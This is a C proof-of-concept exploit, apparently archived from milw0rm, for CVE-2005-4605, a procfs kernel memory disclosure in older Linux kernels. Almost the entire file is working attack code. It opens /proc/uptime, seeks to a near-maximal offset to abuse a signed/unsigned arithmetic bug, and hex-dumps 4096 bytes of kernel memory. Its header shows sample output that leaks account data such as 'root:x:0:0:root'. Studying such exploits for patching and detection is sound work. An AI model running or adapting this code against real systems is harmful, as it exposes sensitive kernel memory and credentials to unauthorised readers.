/*
* cve-2005-4605.c
*
* Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605
*
* The procfs code (proc_misc.c) in Linux 2.6.14.3 and other versions before
* 2.6.15 allows attackers to read sensitive kernel memory via unspecified
* vectors in which a signed value is added to an unsigned value.
*
* Usage:
*
* $ gcc cve-2005-4605.c -o cve-2005-4605
* $ ./cve-2005-4605
* [+] Opened /proc/uptime.
* [+] Seek to offset 4294963199.
* [+] Read 4096 bytes, dumping to stdout...
* ...
* ... 00 00 00 00 11 00 00 00 ................................
* ... 3a 30 3a 72 6f 6f 74 00 localhost.......root.x.0:0:root.
* ... 0d 00 00 00 dc 91 0f 08 /root./bin/bash.....@...........
* ... bc af 0e 08 00 00 00 00 ............p...................
* ...
*
* Notes:
*
* This one is _ancient_, but str0ke requested it! ;-)
*/
#define _FILE_OFFSET_BITS 64
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <unistd.h>
#include <string.h>
#include <inttypes.h>
#include <limits.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define DUMP 4096
#define PROC "/proc/uptime"
#define TYPE_SIGNED(t) (! ((t) 0 < (t) -1))
#define TYPE_MAX(t) ((t) (! TYPE_SIGNED (t) ? (t) -1 : ~ (~ (t) 0 << (sizeof (t) * CHAR_BIT - 1))))
const char hex_asc[] = "0123456789abcdef";
#define hex_asc_lo(x) hex_asc[((x) & 0x0f)]
#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4]
void
hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, bool ascii)
{
const uint8_t *ptr = buf;
uint8_t ch;
int j, lx = 0;
int ascii_column;
if (rowsize != 16 && rowsize != 32)
rowsize = 16;
if (!len)
goto nil;
if (len > rowsize)
len = rowsize;
if ((len % groupsize) != 0)
groupsize = 1;
switch (groupsize) {
case 8: {
const uint64_t *ptr8 = buf;
int ngroups = len / groupsize;
for (j = 0; j < ngroups; j++)
lx += snprintf(linebuf + lx, linebuflen - lx,
"%16.16llx ", (unsigned long long)*(ptr8 + j));
ascii_column = 17 * ngroups + 2;
break;
}
case 4: {
const uint32_t *ptr4 = buf;
int ngroups = len / groupsize;
for (j = 0; j < ngroups; j++)
lx += snprintf(linebuf + lx, linebuflen - lx,
"%8.8x ", *(ptr4 + j));
ascii_column = 9 * ngroups + 2;
break;
}
case 2: {
const uint16_t *ptr2 = buf;
int ngroups = len / groupsize;
for (j = 0; j < ngroups; j++)
lx += snprintf(linebuf + lx, linebuflen - lx,
"%4.4x ", *(ptr2 + j));
ascii_column = 5 * ngroups + 2;
break;
}
default:
for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen;
j++) {
ch = ptr[j];
linebuf[lx++] = hex_asc_hi(ch);
linebuf[lx++] = hex_asc_lo(ch);
linebuf[lx++] = ' ';
}
ascii_column = 3 * rowsize + 2;
break;
}
if (!ascii)
goto nil;
while (lx < (linebuflen - 1) && lx < (ascii_column - 1))
linebuf[lx++] = ' ';
for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++)
linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j]
: '.';
nil:
linebuf[lx++] = '\0';
}
void
print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, bool ascii)
{
const uint8_t *ptr = buf;
int i, linelen, remaining = len;
unsigned char linebuf[200];
if (rowsize != 16 && rowsize != 32)
rowsize = 16;
for (i = 0; i < len; i += rowsize) {
linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize));
remaining -= rowsize;
hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize,
linebuf, sizeof(linebuf), ascii);
printf("%s\n", linebuf);
}
}
int
main(void)
{
int fd, ret;
char buf[DUMP];
off_t seek, offset=TYPE_MAX(off_t);
memset(buf, 0, sizeof(buf));
fd = open(PROC, O_RDONLY);
if (fd == -1) {
printf("[-] Error during open(2)\n");
exit(1);
}
printf("[+] Opened " PROC ".\n");
seek = lseek(fd, offset-DUMP, SEEK_SET);
if (seek == -1) {
printf("[-] Error during lseek(2).\n");
exit(1);
}
printf("[+] Seek to offset %lld.\n", seek);
ret = read(fd, buf, DUMP);
if (ret == -1) {
printf("[-] Error during read(2).\n");
exit(1);
}
if (ret == 0) {
printf("[-] read(2) return 0 bytes, your kernel may not be vulnerable.\n");
exit(1);
}
printf("[+] Read %d bytes, dumping to stdout...\n\n", ret);
sleep(3);
print_hex_dump(32, 1, buf, ret, 1);
return 0;
}
// milw0rm.com [2009-08-05]